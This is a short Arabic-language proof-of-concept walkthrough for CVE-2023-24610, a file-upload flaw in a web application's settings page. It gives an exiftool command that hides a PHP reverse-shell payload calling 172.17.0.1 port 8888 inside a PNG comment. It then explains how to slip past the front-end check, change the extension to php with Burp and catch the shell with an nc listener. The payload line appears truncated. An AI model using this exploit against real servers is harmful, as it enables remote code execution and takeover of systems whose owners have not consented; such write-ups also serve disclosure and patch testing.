
هذا إثبات مفهوم لـ CVE-2023-24610
هذا هو دليل المفهوم لـ CVE-2023-24610
نبدأ بإنشاء ملف متعدد اللغات باستخدام exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

نقوم بتغيير الملف إلى png ليتجاوز الفحص في الواجهة الأمامية

بعد ذلك، نقوم بتشغيل مستمع nc على المنفذ 8888 لاستقبال الصدفة.

الخطوة التالية هي تسجيل الدخول إلى التطبيق والنقر على الإعدادات

في أسفل الصفحة، نرى منطقة شعار الممارسة. يمكننا رفع ملف باستخدام زر التحرير على الجانب الأيمن

نضغط على تحرير ثم نضغط على تصفح، نحدد الملف “.png” الذي أنشأناه في الخطوة الأولى

قبل النقر على رفع، نتأكد من اعتراض الطلب باستخدام burp أو ما شابه ذلك.
نضغط على رفع وفي burp نغير امتداد الملف من “png” إلى “php”

نقوم بإيقاف الاعتراض ليتم رفع ملفنا والتحقق من مستمع nc الذي بدأناه سابقًا.
لدينا صدفة عكسية ويشير عنوان IP إلى حاوية docker الخاصة بنا.
